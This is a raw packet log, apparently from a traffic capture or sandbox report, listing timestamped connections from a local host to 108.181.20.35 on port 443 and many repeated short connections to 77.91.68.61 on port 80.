Jul 27, 2023 01:33:42.226829052 CEST	49854	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:33:42.227111101 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.227144957 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.227742910 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.227766037 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.228302002 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.228357077 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.228473902 CEST	49854	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:33:42.228502989 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.228533030 CEST	49854	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:33:42.228590012 CEST	49854	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:33:42.228755951 CEST	49854	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:33:42.229104996 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.229127884 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.229538918 CEST	49854	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:33:42.229538918 CEST	49854	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:33:42.229562044 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.229585886 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.229617119 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.229712009 CEST	49854	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:33:42.229722977 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.229810953 CEST	49854	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:33:42.229995966 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.230017900 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.230403900 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.230732918 CEST	49854	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:33:42.230834961 CEST	49854	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:33:42.230859995 CEST	49854	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:33:42.231774092 CEST	80	49864	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:42.232573032 CEST	80	49865	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:42.232757092 CEST	49864	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:42.232803106 CEST	49865	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:42.233272076 CEST	49854	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:33:42.233285904 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.233313084 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.234715939 CEST	49854	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:33:42.234827042 CEST	49854	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:33:42.234967947 CEST	49854	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:33:42.235620022 CEST	49854	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:33:42.235975981 CEST	49854	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:33:42.239069939 CEST	49865	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:42.283534050 CEST	80	49865	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:42.287623882 CEST	80	49865	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:42.289186001 CEST	49865	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:42.388365030 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.388401031 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.388506889 CEST	49854	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:33:42.388535023 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.388587952 CEST	49854	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:33:42.388783932 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.388811111 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.389096022 CEST	49854	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:33:42.389107943 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.389127970 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.389162064 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.389442921 CEST	49854	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:33:42.389455080 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.389832020 CEST	49854	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:33:42.392502069 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.392575026 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.392761946 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.392836094 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.393548012 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.393595934 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.394968987 CEST	49854	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:33:42.394994020 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.395019054 CEST	49854	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:33:42.395458937 CEST	49854	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:33:42.395760059 CEST	49854	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:33:42.395806074 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.395845890 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.395929098 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.395986080 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.396034002 CEST	49854	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:33:42.396045923 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.396064997 CEST	443	49854	108.181.20.35	192.168.2.5
Jul 27, 2023 01:33:42.396228075 CEST	49854	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:33:42.396480083 CEST	49854	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:33:42.397317886 CEST	49854	443	192.168.2.5	108.181.20.35
Jul 27, 2023 01:33:42.404211044 CEST	49865	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:42.404946089 CEST	49866	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:42.448808908 CEST	80	49865	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:42.449089050 CEST	80	49866	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:42.455914974 CEST	49865	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:42.456001043 CEST	49866	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:42.511549950 CEST	49866	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:42.556447983 CEST	80	49866	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:42.560585022 CEST	80	49866	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:42.560806990 CEST	49866	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:42.672769070 CEST	49866	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:42.673490047 CEST	49867	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:42.717279911 CEST	80	49866	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:42.717714071 CEST	80	49867	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:42.718096972 CEST	49866	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:42.718168974 CEST	49867	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:42.718657970 CEST	49867	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:42.763185024 CEST	80	49867	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:42.767620087 CEST	80	49867	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:42.767736912 CEST	49867	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:42.873733044 CEST	49867	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:42.885188103 CEST	49868	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:42.918494940 CEST	80	49867	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:42.918664932 CEST	49867	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:42.930059910 CEST	80	49868	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:42.940501928 CEST	49868	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:42.947930098 CEST	49868	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:42.992793083 CEST	80	49868	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:42.996402025 CEST	80	49868	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:42.996530056 CEST	49868	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:43.108844995 CEST	49868	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:43.109440088 CEST	49869	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:43.153707981 CEST	80	49868	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:43.153743029 CEST	80	49869	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:43.153886080 CEST	49869	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:43.153889894 CEST	49868	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:43.156233072 CEST	49869	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:43.200778008 CEST	80	49869	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:43.204761028 CEST	80	49869	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:43.205676079 CEST	49869	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:43.329395056 CEST	49869	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:43.332170963 CEST	49870	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:43.374005079 CEST	80	49869	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:43.374187946 CEST	49869	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:43.376650095 CEST	80	49870	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:43.376810074 CEST	49870	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:43.377254009 CEST	49870	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:43.421539068 CEST	80	49870	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:43.425538063 CEST	80	49870	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:43.425637007 CEST	49870	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:43.529942989 CEST	49870	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:43.531336069 CEST	49871	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:43.574439049 CEST	80	49870	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:43.574564934 CEST	49870	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:43.575265884 CEST	80	49871	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:43.575411081 CEST	49871	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:43.575824976 CEST	49871	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:43.619704008 CEST	80	49871	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:43.624749899 CEST	80	49871	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:43.624881983 CEST	49871	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:43.743344069 CEST	49871	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:43.743971109 CEST	49872	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:43.787383080 CEST	80	49871	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:43.787457943 CEST	49871	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:43.788635015 CEST	80	49872	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:43.788765907 CEST	49872	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:43.789129019 CEST	49872	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:43.833753109 CEST	80	49872	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:43.837945938 CEST	80	49872	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:43.843399048 CEST	49872	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:43.963777065 CEST	49872	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:43.970318079 CEST	49873	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:44.008765936 CEST	80	49872	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:44.010540009 CEST	49872	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:44.014503002 CEST	80	49873	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:44.017638922 CEST	49873	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:44.019273043 CEST	49873	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:44.063390970 CEST	80	49873	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:44.067080975 CEST	80	49873	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:44.069410086 CEST	49873	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:44.180568933 CEST	49873	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:44.183038950 CEST	49874	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:44.224807024 CEST	80	49873	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:44.224915028 CEST	49873	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:44.227531910 CEST	80	49874	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:44.227648973 CEST	49874	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:44.227988958 CEST	49874	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:44.272208929 CEST	80	49874	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:44.275913954 CEST	80	49874	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:44.276000977 CEST	49874	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:44.377568007 CEST	49874	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:44.378207922 CEST	49875	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:44.678057909 CEST	49874	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:44.722482920 CEST	80	49874	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:44.722574949 CEST	49874	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:47.385929108 CEST	49875	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:47.431199074 CEST	80	49875	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:47.431432962 CEST	49875	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:47.432065010 CEST	49875	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:47.476711035 CEST	80	49875	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:47.483247995 CEST	80	49875	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:47.483866930 CEST	49875	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:47.592029095 CEST	49875	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:47.593020916 CEST	49876	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:47.638426065 CEST	80	49875	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:47.638459921 CEST	80	49876	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:47.638605118 CEST	49875	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:47.638648987 CEST	49876	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:47.709750891 CEST	49876	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:47.756546021 CEST	80	49876	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:47.758718967 CEST	80	49876	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:47.758923054 CEST	49876	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:47.870541096 CEST	49876	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:47.897862911 CEST	49877	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:47.916371107 CEST	80	49876	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:47.916512012 CEST	49876	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:47.944577932 CEST	80	49877	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:47.948381901 CEST	49877	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:47.951529980 CEST	49877	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:47.996436119 CEST	80	49877	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:48.000155926 CEST	80	49877	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:48.000231028 CEST	49877	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:48.104912043 CEST	49877	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:48.105578899 CEST	49878	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:48.151201010 CEST	80	49877	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:48.151236057 CEST	80	49878	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:48.151316881 CEST	49877	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:48.151393890 CEST	49878	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:48.156223059 CEST	49878	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:48.201385975 CEST	80	49878	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:48.204979897 CEST	80	49878	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:48.205066919 CEST	49878	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:48.319762945 CEST	49878	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:48.320471048 CEST	49879	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:48.364742041 CEST	80	49878	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:48.365464926 CEST	49878	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:48.365484953 CEST	80	49879	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:48.365564108 CEST	49879	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:48.376681089 CEST	49879	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:48.422874928 CEST	80	49879	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:48.426760912 CEST	80	49879	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:48.428590059 CEST	49879	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:48.543725014 CEST	49879	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:48.544831038 CEST	49880	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:48.588093996 CEST	80	49879	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:48.588177919 CEST	49879	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:48.591497898 CEST	80	49880	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:48.591638088 CEST	49880	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:48.594233036 CEST	49880	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:48.639337063 CEST	80	49880	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:48.643224001 CEST	80	49880	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:48.643363953 CEST	49880	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:48.745790958 CEST	49880	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:48.746737003 CEST	49881	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:48.790766954 CEST	80	49880	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:48.791007996 CEST	49880	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:48.791388035 CEST	80	49881	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:48.791505098 CEST	49881	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:48.792063951 CEST	49881	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:48.836412907 CEST	80	49881	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:48.840384960 CEST	80	49881	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:48.840548038 CEST	49881	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:48.954336882 CEST	49881	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:48.955226898 CEST	49882	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:48.999352932 CEST	80	49881	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:48.999489069 CEST	49881	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:49.000281096 CEST	80	49882	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:49.000410080 CEST	49882	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:49.013005972 CEST	49882	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:49.057859898 CEST	80	49882	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:49.061811924 CEST	80	49882	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:49.061954021 CEST	49882	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:49.188503027 CEST	49882	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:49.189585924 CEST	49883	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:49.233383894 CEST	80	49882	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:49.233428001 CEST	80	49883	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:49.233465910 CEST	49882	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:49.233525991 CEST	49883	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:49.237848043 CEST	49883	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:49.281795025 CEST	80	49883	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:49.286613941 CEST	80	49883	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:49.286686897 CEST	49883	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:49.406374931 CEST	49883	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:49.407532930 CEST	49884	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:49.450431108 CEST	80	49883	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:49.450537920 CEST	49883	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:49.452035904 CEST	80	49884	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:49.452162981 CEST	49884	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:49.452519894 CEST	49884	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:49.496741056 CEST	80	49884	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:49.525623083 CEST	80	49884	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:49.525712967 CEST	49884	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:49.638145924 CEST	49884	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:49.639300108 CEST	49885	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:49.682521105 CEST	80	49884	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:49.682647943 CEST	49884	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:49.683470964 CEST	80	49885	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:49.683676004 CEST	49885	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:49.712986946 CEST	49885	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:49.756916046 CEST	80	49885	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:49.771796942 CEST	80	49885	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:49.771867037 CEST	49885	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:49.891472101 CEST	49885	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:49.907639027 CEST	49886	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:49.937824965 CEST	80	49885	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:49.937941074 CEST	49885	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:49.952083111 CEST	80	49886	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:49.952245951 CEST	49886	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:49.970875978 CEST	49886	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:50.017755985 CEST	80	49886	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:50.021749973 CEST	80	49886	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:50.021874905 CEST	49886	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:50.136650085 CEST	49886	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:50.137681961 CEST	49887	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:50.181794882 CEST	80	49886	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:50.181875944 CEST	80	49887	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:50.181898117 CEST	49886	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:50.181969881 CEST	49887	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:50.182462931 CEST	49887	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:50.226706982 CEST	80	49887	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:50.230967999 CEST	80	49887	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:50.231111050 CEST	49887	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:50.339258909 CEST	49887	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:50.340147972 CEST	49888	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:50.383919001 CEST	80	49887	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:50.384013891 CEST	49887	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:50.384048939 CEST	80	49888	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:50.384151936 CEST	49888	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:50.387784004 CEST	49888	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:50.432293892 CEST	80	49888	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:50.436274052 CEST	80	49888	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:50.436418056 CEST	49888	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:50.548074961 CEST	49888	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:50.549487114 CEST	49889	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:50.592206955 CEST	80	49888	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:50.592307091 CEST	49888	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:50.593734026 CEST	80	49889	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:50.593866110 CEST	49889	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:50.594661951 CEST	49889	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:50.638921022 CEST	80	49889	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:50.642767906 CEST	80	49889	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:50.642853022 CEST	49889	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:50.751240969 CEST	49889	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:50.752254009 CEST	49890	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:50.795823097 CEST	80	49889	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:50.796134949 CEST	80	49890	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:50.796205997 CEST	49889	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:50.796242952 CEST	49890	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:50.796665907 CEST	49890	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:50.840611935 CEST	80	49890	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:50.843838930 CEST	80	49890	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:50.844454050 CEST	49890	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:50.948942900 CEST	49890	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:50.951339960 CEST	49891	80	192.168.2.5	77.91.68.61
